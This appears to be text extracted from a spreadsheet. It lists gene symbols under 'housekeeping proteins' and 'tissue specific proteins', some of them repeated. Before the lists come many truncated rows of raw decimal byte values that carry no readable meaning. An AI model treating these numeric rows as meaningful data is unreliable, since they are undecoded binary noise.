	125 113 194 224 93 214 213 253 0 222 28 217 85 47 5 135 226 205 108 73 149 96 107 42 219 116 65 211 184 128 162 176 160 66 47 189 102 171 196 143 119 239 64 114 164 37 216 64 156 157 49 217 143 87 76 11 77 67 241 115 87 93 119 18 111 200 133 19 43 94 52 191 47 125 243 92 193 133 109 158 248 6 123 94 174 215 252 193 190 118 50 98 123 31 150 247 70 240 180 141 174 105 60 151 254 101 213 193 221 91 …
	235 203 42 28 162 16 221 251 63 161 179 47 87 109 221 97 127 65 28 62 246 61 177 184 26 23 86 190 32 62 35 70 131 81 161 235 135 190 39 100 188 22 175 70 85 213 120 57 174 114 86 43 53 94 244 245 216 54 199 111 43 106 28 223 90 181 104 245 7 171 231 20 90 239 183 152 47 23 13 31 65 171 31 188 250 109 131 48 97 74 222 185 76 40 49 180 15 160 110 139 217 98 254 219 186 255 99 39 249 105 39 107 206 …
	169 65 186 170 164 75 211 135 73 215 46 149 106 210 210 154 116 142 128 74 69 100 169 33 105 26 215 164 45 197 100 69 186 174 38 93 229 74 47 90 67 101 170 111 34 115 145 200 236 174 78 135 214 49 153 252 251 49 25 39 102 81 99 26 61 116 83 149 53 68 252 51 186 48 37 122 215 91 211 18 74 155 243 200 106 140 160 148 84 204 115 72 118 9 166 62 239 160 218 106 37 100 77 147 5 216 162 207 168 209 139…
	164 110 215 248 165 127 22 227 175 45 61 121 147 12 224 255 99 239 89 160 219 42 174 28 61 201 138 163 200 137 136 147 0 177 113 132 67 154 16 108 71 146 229 111 226 52 250 218 38 182 100 91 78 130 137 192 79 150 158 226 135 101 73 72 207 63 8 193 9 161 229 31 74 161 205 158 3 52 244 147 205 110 23 54 225 211 5 150 179 11 36 228 0 27 2 105 216 238 66 183 219 208 45 61 229 83 32 77 248 236 90 182 …
	72 45 229 40 35 130 123 20 240 6 77 60 5 32 236 10 155 51 93 225 210 34 252 88 168 216 11 138 169 140 153 200 213 180 23 88 201 86 114 185 86 18 115 124 126 107 222 14 7 175 189 133 196 243 201 148 134 214 31 243 119 230 145 145 125 34 253 181 139 242 246 20 82 55 93 75 42 68 57 37 162 234 73 41 37 106 3 185 68 33 138 172 129 134 90 151 251 18 190 156 182 220 138 172 166 146 199 3 12 89 154 121 1…
	20 148 246 111 16 254 6 194 129 148 76 215 28 90 89 43 122 5 189 89 153 139 231 159 127 27 50 243 110 102 154 101 101 3 229 212 101 210 55 166 169 223 62 150 144 15 213 165 51 236 47 210 228 40 58 173 176 60 191 81 193 17 27 140 7 18 220 220 78 22 72 244 9 9 71 44 58 60 186 146 37 243 73 175 189 119 56 144 232 149 96 55 150 176 64 211 112 223 166 40 31 140 133 184 47 246 179 68 3 244 166 213 42 2…
	23 18 23 8 133 100 247 6 144 221 140 144 64 35 188 114 197 180 2 33 71 225 55 17 133 199 142 254 64 34 16 20 184 68 50 177 13 123 85 38 206 59 176 87 4 146 161 242 33 40 137 196 226 72 205 168 128 171 97 127 249 172 252 124 134 135 192 222 155 239 157 1 133 167 171 45 216 153 19 92 32 20 136 68 158 223 132 121 10 163 194 55 126 142 101 9 49 33 16 73 2 83 118 199 21 110 139 219 69 112 149 99 236 1…
	39 193 93 206 61 227 23 104 111 29 87 237 116 90 156 238 122 39 49 89 29 149 53 118 183 141 84 154 77 102 123 165 221 249 67 87 205 184 211 102 27 183 91 199 11 24 203 109 206 142 46 111 115 151 141 180 27 221 173 109 46 159 159 180 183 58 186 188 62 175 155 116 27 189 110 119 171 195 197 248 53 234 118 159 183 161 202 73 218 218 150 211 157 90 70 250 61 240 91 220 198 6 99 149 201 232 237 83 61 …
	156 62 56 26 253 162 78 19 85 218 177 192 32 125 157 104 10 69 138 14 168 85 89 111 25 13 72 119 169 10 157 100 53 79 59 141 108 133 38 112 255 17 167 145 209 1 104 21 196 208 89 232 114 120 2 133 73 236 9 205 240 23 212 45 52 179 155 180 18 60 235 0 218 30 48 188 0 107 135 191 158 156 148 118 184 119 208 39 125 16 64 45 67 186 15 122 184 13 96 46 16 32 191 180 190 43 95 107 165 59 23 220 85 65 1…
	16 13 161 77 144 145 162 182 36 126 203 66 78 116 242 131 56 90 146 199 251 174 115 31 255 195 200 32 64 177 123 51 89 183 134 113 163 118 38 150 68 167 240 114 65 30 60 181 248 13 152 145 103 162 253 184 93 151 220 157 193 143 37 208 145 187 140 239 227 4 244 213 158 137 14 245 225 103 165 100 186 186 251 113 19 253 147 153 184 144 24 226 52 119 173 18 237 63 177 68 232 169 1 150 168 245 155 237…
	32 142 92 49 140 162 197 41 216 127 204 63 131 147 193 126 225 52 182 137 114 210 180 119 45 86 118 184 175 7 55 65 95 242 16 54 208 112 159 107 52 24 9 12 82 22 223 250 50 74 0 77 15 124 93 76 237 145 247 75 115 145 223 94 143 226 54 220 39 198 86 126 132 18 212 28 235 126 242 126 69 54 186 184 72 44 16 90 249 158 82 37 52 137 143 217 34 145 248 118 150 44 204 192 176 31 1 48 99 209 123 247 144 …
	163 50 167 34 215 15 241 66 195 99 108 230 200 226 125 47 162 36 243 209 164 112 220 47 139 122 134 0 4 55 190 136 200 120 151 24 89 112 88 49 192 103 161 36 70 198 154 16 169 21 239 135 230 207 68 18 19 70 155 68 165 208 205 137 235 143 217 1 6 50 59 110 146 140 30 186 172 125 192 185 86 46 121 95 48 188 183 231 202 54 14 121 255 99 161 52 47 64 55 30 184 205 243 217 247 223 124 219 104 49 153 1…
	161 250 64 172 110 0 97 2 25 158 87 70 191 218 57 66 205 151 2 204 164 135 168 165 33 14 179 238 122 152 155 214 146 26 156 25 106 15 73 61 73 246 150 7 189 140 122 50 128 10 215 86 57 219 218 114 77 150 47 49 243 200 65 146 223 156 201 163 169 115 150 52 66 46 124 93 140 61 248 242 244 171 12 151 127 114 188 241 117 233 11 127 175 79 135 231 94 115 243 201 141 207 150 255 249 254 190 140 142 92 …
	61 171 183 77 60 80 212 115 230 187 88 55 173 47 52 208 210 89 212 163 79 247 120 159 217 58 191 123 124 12 161 47 250 212 227 88 254 123 190 207 239 60 241 173 219 183 170 160 212 214 158 36 187 209 115 167 71 159 190 214 179 236 222 162 158 70 207 200 45 136 219 218 51 113 231 202 158 198 49 125 250 112 239 222 190 59 6 78 15 34 84 231 95 16 64 122 245 233 207 239 76 250 26 199 222 29 65 232 41…
	189 231 204 153 115 239 61 59 120 213 110 27 79 175 172 204 233 224 32 156 223 53 70 49 24 181 104 161 246 14 170 187 199 255 102 139 242 130 186 11 6 225 152 45 187 75 37 157 216 199 255 14 178 5 89 4 189 185 72 65 185 173 11 170 233 241 112 171 46 141 110 156 61 212 168 149 218 139 49 76 123 104 80 101 71 157 254 4 208 192 70 149 127 250 251 146 219 117 179 226 63 184 40 142 137 226 111 221 8 2…
	171 123 45 126 253 19 45 220 19 212 230 110 235 188 158 126 164 215 53 237 193 11 207 146 141 150 103 91 253 218 196 247 236 78 171 31 192 226 122 146 223 150 47 115 85 60 208 5 229 116 205 135 173 230 114 38 73 59 190 87 15 95 183 129 71 74 75 160 233 52 254 59 231 249 156 130 181 12 255 47 227 255 205 20 172 192 244 42 90 125 38 107 113 195 99 180 255 131 235 45 15 153 242 53 38 157 203 53 149 …
	74 203 79 31 160 25 148 155 253 163 238 193 198 33 15 29 159 217 223 178 233 108 221 129 214 184 138 21 245 177 163 177 245 151 246 158 238 238 108 160 249 135 235 47 94 126 161 164 98 255 246 216 209 220 154 199 26 68 197 100 247 59 245 142 1 58 179 107 176 111 112 77 205 174 157 244 249 184 123 235 5 72 255 243 237 228 52 33 134 128 12 60 80 243 128 21 64 5 208 11 188 4 248 128 119 129 147 192 …
	90 66 115 47 225 108 201 65 191 133 181 171 83 181 181 159 87 228 205 253 191 221 135 225 254 254 111 162 94 63 85 20 172 190 54 250 10 246 177 24 212 124 113 248 181 254 183 182 172 218 87 91 231 169 212 107 173 17 127 85 94 29 189 134 61 189 17 238 210 222 35 238 27 173 77 91 104 44 244 160 112 102 58 151 102 138 134 76 122 183 125 17 158 49 107 75 29 98 67 169 17 213 80 150 34 182 149 62 16 21…
	131 131 60 31 31 65 175 177 74 226 189 70 116 45 32 228 58 115 4 61 112 177 196 123 224 208 206 22 114 122 98 4 156 182 8 78 33 141 37 228 52 107 4 181 176 81 226 181 112 46 233 244 152 90 113 43 15 121 61 57 130 82 251 182 40 53 212 41 42 215 105 17 125 157 238 145 107 218 8 198 190 239 72 124 236 67 141 52 228 49 123 4 109 246 132 196 219 44 234 146 125 232 154 190 13 249 164 143 160 180 94 23 …
	168 205 219 50 31 232 163 47 142 17 170 79 248 233 153 12 88 78 20 106 169 147 132 225 73 180 137 63 77 24 186 68 251 243 143 51 174 252 191 20 63 18 51 126 96 37 110 198 236 6 60 192 240 128 67 70 234 93 63 5 68 85 174 30 241 77 226 3 64 84 223 26 111 98 116 44 237 84 192 39 1 151 2 230 155 248 225 205 155 0 183 0 214 1 238 4 220 7 120 0 240 16 224 171 128 63 4 124 199 196 143 132 184 7 136 7 16…
	195 228 144 28 113 142 120 199 104 199 35 142 177 142 36 199 120 135 205 49 201 97 82 37 53 65 29 173 38 170 227 212 71 213 41 234 116 117 185 234 84 55 169 21 234 115 106 239 87 190 167 152 198 54 178 191 5 217 83 237 83 237 22 199 24 71 162 99 156 195 234 72 118 164 56 44 32 223 82 117 163 250 190 250 225 31 45 213 63 143 234 78 56 197 142 176 111 183 77 248 51 228 65 50 182 246 135 5 249 223 5…
	226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48…
	168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 2…
	219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 2…
	234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 24…
	186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 …
	83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 …
	53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68…

## Sheet: housekeeping proteins
DPM1
GCLC
LAP3
LASP1
ARF5
AK2
FKBP4
UPF1
SLC25A5
PRKAR2B
LAMP2
RALA
GGCT
PAFAH1B1
DNAJC11
PSMB1
SYPL1
CSDE1
UQCRC1
LYPLA2
NME2
PTBP1
PPP5C
PSMC4
HEBP1
UFL1
CAPN1
MDH1
MATR3
SERPINB1
FHL1
RNH1
NDUFS1
ERP44
DERA
STRAP
EHD2
VIM
SNX1
SARS
UBA6
VCL
ADSS
MAT2B
PSMA4
CAPG
DCUN1D1
HSPA5
ATP6V1H
TPR
MAP4
HEXB
HEBP2
AKR7A2
TRAPPC3
CUL1
EIF2AK2
GDI2
PITHD1
PPP1R12A
NCKAP1
CS
EIF4B
ISOC2
HAGH
AP3D1
GNAI3
IPO5
ELAVL1
ISOC1
PFKP
PKM
RHOA
IARS2
ROCK1
ACSL4
CYFIP1
PYGM
VPS35
DNAJA2
UFD1L
NUCB2
PABPC1
CDC42
WDR1
RDH11
PRKACA
ACTN1
ALDH3A2
ACADVL
AP1M1
SDHA
FERMT2
PICALM
NSF
ENO1
C19orf10
SRI
TTC38
ACAT1
SLC25A3
FSCN1
RAB7A
SART3
PTPN23
SNRPA
DYNC1I2
CAPZB
UBE2K
GNB1
TOLLIP
XRCC5
LXN
SAR1A
PAFAH1B3
DDX1
DNM2
STX7
RAB21
HSP90AA1
BZW1
ME2
XPO1
TNPO1
OXCT1
GSTP1
EIF3I
APOB
RAB10
HADHA
CD59
PREP
AKR1B1
CPNE3
DNAJA1
TMED2
FTL
SRRT
BAX
PSMC5
ADD1
C14orf166
SF3B2
GNAS
DNM1L
KHSRP
GNA11
COQ9
NSFL1C
SNX5
PEBP1
ERP29
FUS
GANAB
BLVRB
NUDC
PDPR
AARS
GLG1
DLD
TXNL1
FH
TF
PSME1
OSGEP
SCFD1
HNRNPC
PHGDH
EZR
MYL6
AGO1
DPYSL2
COMT
ECHDC1
PSMD5
NANS
HSP90AB1
HNRNPH3
SH3GLB1
RAB18
PSMD8
HNRNPM
MTAP
RANBP1
BCL2L13
SNRPD3
MAPK1
PPM1F
LGALS1
EIF3L
DDX17
CYB5R3
PACSIN2
AP1B1
TOM1
TTLL12
MYH9
ACO2
FKBP3
PRMT5
PYGL
PSMC6
PSMA3
GSTZ1
AHSA1
DHRS7
PPM1A
EIF5
MTHFD1
PSMC1
APEX1
PSMA6
PSME2
SEC23A
GMPR2
GSS
PYGB
PFDN4
TPD52L2
CTSZ
PSMA7
CSNK2A1
SAMHD1
IDH3B
MAPRE1
AHCY
APMAP
USP14
VAPA
PSMD10
PGRMC1
SMS
EEA1
CORO1A
MAPK3
CYB5B
NME3
PSMD7
COTL1
UBE2I
TCEB2
CPPED1
HMOX2
FAH
EHD4
VPS18
CA2
DECR1
RAB2A
EIF3E
TSTA3
EEF1D
GSR
ASAH1
NUCB1
ECH1
HNRNPL
SGTA
ILVBL
RPS16
GPI
TBCB
ETFB
CDC37
NAPA
BCAT2
PPP2R1A
TNPO2
ISYNA1
COPE
ETHE1
PMPCB
NAMPT
OGDH
HIBADH
ABHD11
GARS
HSPB1
EIF3B
AIMP2
PSMA2
BLVRA
RHEB
YKT6
EIF4H
PDLIM1
EIF3A
LHPP
PITRM1
GLRX3
XPNPEP1
PSMB3
PSMD3
KPNB1
CDK5RAP3
GALK1
PFN1
SLC25A11
C1QBP
BLMH
DRG2
PSMD11
VAT1
LRRC59
DUSP3
EFTUD2
PRKAR1A
YWHAE
ALDOC
TMEM33
GRPEL1
DHX15
HSPA8
EHD1
OSBP
DCPS
PRPF19
TMEM109
COMMD9
CARS
RPS13
AIP
NDUFS8
PSMD9
CORO1C
MLEC
ATP5B
PTGES3
LTA4H
ARPC3
VPS29
ALDH2
ARHGDIB
EIF2B1
COPZ1
CAND1
RAB5B
GAPDH
COPS7A
LDHB
PRKAB1
RAB35
SRSF3
SOD2
ACOT13
SNX3
DNPH1
NNT
HSPA9
CLINT1
TTC1
GNPDA1
SKP1
RARS
ERGIC1
NIT2
PDCD10
PRKAR2A
TFG
GBE1
ATP6V1A
ABHD14B
EIF4G1
EEF1B2
FAHD2A
NCL
ACTR1B
ACTR3
GPD2
PSMD14
SPTBN1
RTN4
LANCL1
CCT4
SF3B1
HDLBP
PPP1R7
HPCAL1
DARS
SRSF7
PCYOX1
FARSB
CACYBP
SCP2
PARK7
ATP5F1
CAPZA1
SFPQ
SRM
TROVE2
UCHL5
CRYZ
ADPRHL2
ACADM
SDHB
HMGCL
GALE
AKR1A1
PRDX1
CNN3
PRDX6
STX12
TXNDC12
ESYT2
CTSD
SPCS2
RPN2
UCHL3
RAD23B
SET
PPP2R4
RAB14
PPP6C
HSDL2
VPS4B
NPC2
DLST
ALDH6A1
IDE
GOT1
GNA13
PCMT1
ACAT2
TCP1
HSPH1
ETF1
PLS1
TMPO
ARL1
TARDBP
LYPLA1
COPS5
TRIM25
NAA50
CAT
KHDRBS1
PLG
COPA
ANXA11
HNRNPA2B1
GLIPR2
CLTA
ACO1
CALD1
VPS26A
ACOT9
PRDX4
TSFM
ACSL3
DNPEP
VAPB
CSE1L
RAB22A
PEPD
NAGK
USP9X
F13A1
SERPINB6
RPS10
GLO1
SSR1
EEF1E1
AHNAK
GOT2
NT5C
CCDC93
C3
VASP
PSMF1
RRBP1
DSTN
NCLN
PSMB2
CAPNS1
PRDX5
PRMT1
RRAS
ASL
SBDS
TRAP1
DNAJC8
KTN1
HSPA2
MAP2K2
CANX
PPCS
EMC1
HP1BP3
EPS15L1
MACF1
TUBA4A
ECHS1
HIP1
PAICS
YWHAH
MPST
TST
RAC2
FLNC
CALU
IVD
DUT
VPS13C
COPB1
TXNDC17
MPDU1
ILF3
SLC44A2
SNX6
REEP5
PRKCSH
XPO7
PGLS
ACTN4
NDUFA10
ARPC1B
MAP1S
UBE2M
TRIM28
EIF2S3
LRRC47
EIF3G
ACSS2
ATP6V1E1
COX4I1
CAP1
PPT1
VPS25
PDHA1
SNRPA1
LGALS3
RAN
EIF5A
FLOT2
PCNA
AP3B1
SCO1
TPT1
CNDP2
RTN3
MYH11
KRAS
LARS
IMPA1
HSD17B4
EIF2S1
ARL8B
NAPG
YWHAQ
ROCK2
IAH1
LDHA
NARS
YARS
TPP2
TMED7
OSTF1
ANXA1
SYNCRIP
CDK4
HNRNPA1
CCT7
USP15
DHX9
CAB39
CKAP4
FLNB
SUCLA2
LCP1
SCRN1
RAC1
DBNL
NMT1
SRSF1
EPRS
UGGT1
NIPSNAP3A
TXN
ANP32B
TLN1
DCTN3
GRHPR
ALDH1B1
HINT2
PPIL1
ARRB1
NUMA1
PRCP
RDX
UACA
CCBL2
RTCA
HADHB
RAB1A
ACTR2
LRPPRC
ACTR1A
MYOF
ARL3
ANXA7
ATIC
SSB
IDH1
OLA1
COPS4
HNRNPD
SEC31A
SCARB2
USO1
PPA2
HADH
GLTP
C12orf10
ESYT1
ESD
TMX1
WARS
SORD
SRP14
ANP32A
ETFA
WDR61
TPM1
IQGAP1
PMM2
UQCRC2
NDUFB10
COPS3
PRPSAP2
NPEPPS
SCRN2
CLTC
PTRH2
AFG3L2
ARHGDIA
EIF4A3
TBCD
FN3KRP
PFKL
SOD1
SAE1
PSMB6
EFHD2
PGD
HSPG2
SERBP1
PRKACB
PSMA5
ALDH9A1
UFC1
PFDN2
HDGF
TOR1AIP1
LYPLAL1
ANP32E
RAB13
S100A8
TPM3
ILF2
ACP1
GUK1
PARP1
ARL8A
PDIA6
GALM
RALB
HSPD1
RAB5A
GMPPA
UBA3
ARL6IP5
ABHD10
SRPRB
LPP
ENOPH1
IQGAP2
BTF3
DDX46
MUT
C6orf211
MDH2
GBAS
CCT6A
MSN
NONO
SNX12
PRPS1
RBMX
ATP6V1B2
PROSC
MTDH
EIF3H
TATDN1
AK3
SIGMAR1
STOM
GSN
ALAD
PTGES2
COMMD3
RSU1
GLUD1
ADD3
GSTO1
HSD17B12
EIF3M
SERPINH1
RPS3
AASDHPPT
LAMTOR1
DAK
COMMD7
FERMT3
PPP4C
ALDOA
ITGB1
PDCD4
CCT5
TWF1
EIF4E
QDPR
ITIH2
ACSL1
ATP5A1
PFKM
GPD1L
SAR1B
IFIT5
UTRN
CARHSP1
CAST
HNRNPU
FAM49B
DDAH1
TOMM70A
BUB3
ATP6V1C1
RHOC
PDIA4
GNAQ
ADK
CCT8
HK1
AIFM1
EIF4A2
SEC13
DHRS4
APPL1
TAGLN2
NIT1
CSRP1
CBR1
CBR3
CYB5R1
PSMB4
NAE1
CTBP1
ZYX
CALM3
PDXK
CSTB
C21orf33
LSS
FDPS
LMNA
PSMC2
AP2M1
FDXR
SRSF2
EIF4A1
UBXN1
CMPK1
C1orf123
PEF1
FUBP1
ARPC5
NCSTN
BPNT1
CAPN2
MEMO1
PDLIM5
S100A11
S100A9
GNPDA2
PMVK
APOA1BP
ATP1A1
ARPC2
CCT3
SUCLG1
ALB
PSMD6
GMPS
RPN1
TKT
PGRMC2
APEH
HMGB2
ANXA5
NAA15
ARFIP1
ERAP1
FABP5
CTSB
CDK5
YWHAZ
KIAA0196
ALDH1A1
C9orf64
HNRNPK
VCP
STOML2
CFL2
SUGT1
CRYL1
ARF6
NUDT5
ATP5C1
VDAC2
PRDX3
HPRT1
PSMC3
RAB8B
API5
COPS2
CCT2
CUL5
ILK
TPP1
CYB5A
IDH3A
HSP90B1
AP1G1
PPIB
YWHAB
MARS
PDIA3
NUDT21
PHB
HDHD2
ACAA2
TPM4
RAB8A
GPX4
EEF2
GLOD4
KRT1
OTUB1
PRDX2
ATP5H
ECI1
DDB1
FTH1
SLC3A2
RPSA
COPS6
PAFAH1B2
RAB4A
PDHB
ARF4
DTYMK
STIP1
FNTA
STAT3
GFM1
MAT2A
MAP2K1
HNRNPH1
SLC25A6
UBE2V2
LMAN2
PGM2
CLIC4
PCBP1
FASN
GPS1
DCXR
RAC3
LIMS1
UGP2
HNRNPF
YWHAG
HNRNPA3
PDCD6IP
TMED10
HARS
PA2G4
ARL6IP1
SERPINB9
NUDCD2
HSPA4
KIF5B
GAA
PGAM1
KRT9
TBCA
FGG
FGA
FGB
RPS7
TLN2
PPIH
QARS
CYCS
SUCLG2
GNB2
PPP1CA
CORO1B
CFL1
KRT2
OXSR1
FKBP2
GMPPB
PSMD1
STAT5B
CCS
PITPNA
RAB1B
PSMD2
DCTN2
ARHGAP1
EIF3F
CLTB
C11orf68
RAB6A
RUVBL1
SFN
RNPEP
SPRYD4
LMNB2
RMDN1
RUFY1
SHMT1
SEC24C
RHOG
TALDO1
RPS6KA3
PDDC1
FLII
CHID1
GRB2
UBE2N
IMPDH2
KCTD12
PFAS
TUFM
CYC1
FUCA1
CALR
RAD23A
FAHD1
PPA1
PITPNB
NPM1
RAP2B
COPG1
PRKAG1
IDH2
IST1
ANXA2
C11orf54
AP2A2
RUVBL2
SF3A3
ALYREF
DIABLO
EIF3C
NIPSNAP1
PGP
COPB2
ATL3
APOO
TMED9
H1FX
AP3M1
PURA
RAB11B
HGS
METTL7A
P4HB
PSMD13
UBE2L3
DRG1
ANKFY1
PCYT2
LAMP1
AIDA
KRT5
PPP1CC
KRT10
NAP1L1
CHP1
USP7
TUBB4B
HBA2
SUMO2
RPL14
H1F0
SF3B3
HMGB1
S100A4
ACADSB
PPIA
NIF3L1
IARS
LONP1
XRCC6
NACA
PLXNB2
VKORC1L1
NHLRC2
AP2A1
ANXA4
ANXA6
GMFB
DYNC1H1
PCBP2
SND1
SULT1A2
PSMD12
SERPINA1
GSTK1
HNRNPAB
SPTAN1
PSAP
HIST4H4
MYO1C
ADH5
ERO1L
S100A6
RPS4X
HIBCH
DDRGK1
HSD17B11
ASNA1
GFPT1
TXNRD1
TPM2
NUDT16
COPS8
TTC37
IPO9
PNP
OPA1
CAPZA2
APRT
NAGA
VARS
HLA-C
ABCF1
GNB2L1
DCTN1
SNX2
IPO7
NAP1L4
HLA-A
SACM1L
TSN
NRAS
GSTM2
C8orf82
VDAC1
HEXA
NDUFS3
PPP1CB
CARKD
CPNE1
FIS1
HNRNPUL2
PPP2R2A
HBD
GPX1
TXNDC5
NME1
ADSL
RDH14
MIF
ATP5J2
ARPC4
ARPC1A
ATP5O
EIF6
DDOST
UBE2V1
HBB
TWF2
PDCD6
PRKDC
CHMP4A
IGLL5
EEF1G
DPP3
CNPY2

## Sheet: tissue specific proteins
CSN1S1
SERPINE3
CDRT1
C1orf110
KLK13
HECTD2
CSN2
AFF1
CHRDL2
TPO
MMP11
NUPR1
CSN3
ARHGAP36
PIM1
USP45
C3orf30
ARNTL
SUSD5
IL36A
FNIP1
SLC16A6
TNFRSF14
SPIN4
RTN4RL1
C6orf58
IL36A
MUC21
TMPRSS11E
TMEM100
CD207
MUC21
NPY
TTLL5
EMC9
MAGEE1
SMTNL1
CST5
CNFN
C9orf169
MATN3
XYLT2
HAVCR1
FOXD1
TNFRSF18
C12orf49
OXTR
TMPRSS11E
NPVF
CHAC1
ARHGAP36
KRTAP26-1
SCNN1A
CD69
CCND1
IGF1
KRTAP20-2
TGM7
PLA2G4B
NMNAT2
PAPPA2
TBCCD1
PMEL
ZNF649
CLEC2B
KRTAP4-4
WIF1
DCLRE1A
CDK5RAP1
SLC22A7
PLCXD1
MAS1
CABP7
KRTAP7-1
MYBPH
LECT1
SLC16A6
KRTAP3-2
USP45
TMEM182
PRR4
PRDM5
AGPHD1
AFF1
PLA2G4E
MAGEE1
FUT2
JHDM1D
GK5
SLC30A8
FOXD1
AFF1
BMP7
KLHL33
PLAU
RS1
C4orf48
CD1C
UPK1B
MYRIP
MMP11
CRYGC
LHX9
CHST6
CRYGB
CRYGA
CAPZA3
CRYBA4
CRYBA2
DEDD2
CST5
RGMB
C7orf60
CRYBA1
CCDC83
MMP11
FAM46A
SBK1
GZF1
DNAJC5G
STC2
EHF
APOL5
HIC2
C4orf40
KLHL30
BOC
C9orf43
RIMS4
GPR133
SNAI3
CLCF1
TNFAIP6
PRAMEF22
SALL3
CHAD
CCDC84
VSTM2B
METRN
CLDN18
CA10
MLLT11
XYLT2
KLHL30
NBL1
SLC22A13
RTN4RL1
PRADC1
MIOX
HECTD2
SOHLH2
MILR1
DCAF12
SLC16A4
PRR4
ESYT3
TMCO2
CXCL5
CXCL3
MAP3K14
GPR133
SLC22A12
ZNF219
SLC45A4
IHH
PLCZ1
GOT1L1
SUSD5
FUT2
SPATA6
F2R
NPY
LY6G6F
B4GALNT3
C7orf45
FAM160A1
SLC5A5
CDKN1A
PRSS54
AQP9
CETP
XKR3
SLC22A16
CYP26A1
TPCN2
TP53TG5
PCDHA12
BMPER
CSN3
TBCCD1
CALY
VEGFC
SLC5A8
C3orf30
C3orf43
C7orf57
SLC5A5
PAQR8
CLDN19
PHLDA1
CST5
PTPN20A
SMR3B
PATE1
CASR
IL37
INS
FAM46A
PKMYT1
IQCF3
ACVR1B
MYOG
FAM71E2
FAM71E2
EHF
TM2D3
CYP2F1
LOXL3
TSSK4
TCP10L
STAP1
C1QTNF1
C4orf40
SH2D5
P2RY13
IMMP1L
SH3YL1
ZNF77
SLCO6A1
INCA1
SLC7A9
ST8SIA5
USP49
SLC22A7
MYRIP
CRISP1
KLK2
OR10A7
GPR161
B4GALNT1
ADAMTS7
TIGD7
ADAMTS7
G6PC
MC2R
FAM173B
LACRT
PRSS22
EDDM3A
SLC34A1
ZBED5
MSMB
UNC93A
BIVM
ZNF521
SLC22A4
ZMYND15
CPO
A4GALT
IL1RL1
PATE1
PATE4
PAPPA2
SLC9A3
ZNF786
SECTM1
HAND1
OXTR
CX3CL1
PTTG2
SLC17A3
SLC17A3
ATOH8
CCDC70
CCL21
KLHL1
LIPK
CLEC12A
CCL21
SLC22A7
LIPK
MSRB1
KCP
C5orf30
OSCAR
GTF2H5
LAPTM5
SLC22A13
RPH3AL
LCN9
BMP1
UPK3A
TTLL5
CXCL3
CDKN1A
WDR31
KIF12
SLC30A2
HAMP
CXCL5
UPK1A
ERVFRD-1
PSG11
KISS1
FAM46A
BMP3
CLEC12A
ZBTB46
TBC1D16
PIRT
TICAM2
RGS5
COX4I2
TIGD7
BMP1
CLCF1
OXER1
ELTD1
CD300E
TNFRSF14
CHRNA9
ARMCX6
MSANTD1
FZD3
DEFB1
DCAF15
SGCA
MIA
CCND2
OAZ2
ANKDD1A
NR1D1
C1orf167
CCND1
SOCS2
ZDHHC1
OR6C4
CPLX4
DUSP10
CD72
C5orf30
B4GALT2
IGSF6
TP53
SPRY2
PLEKHG7
GRXCR2
H1FOO
KIAA1456
EDN3
SLC16A4
RSPO3
TIFA
CD69
PIM1
SCNN1B
ANAPC15
MLXIPL
TMEM242
PTPRH
LCN9
FAM86C1
CCDC83
FAM157A
ESR2
VPS37D
GPR161
GPR182
TMEM234
RNF6
APPBP2
GTF3A
FCRL1
SCNN1G
HAS3
KL
SLC18A1
NCOA4
PPP1R1C
ADAMTS8
CCDC3
AEBP2
CMTM8
ST3GAL3
SLC22A12
CD160
ZNF551
SYCN
GLB1L2
ESYT3
FBXL6
RHBDD3
LRRTM3
CD1B
RPP21
MFSD2B
CCR3
NPHP1
LY6G5B
TTC31
PPP1R42
CHFR
NR4A2
SLC35C2
PARP11
ZBTB8B
KLRB1
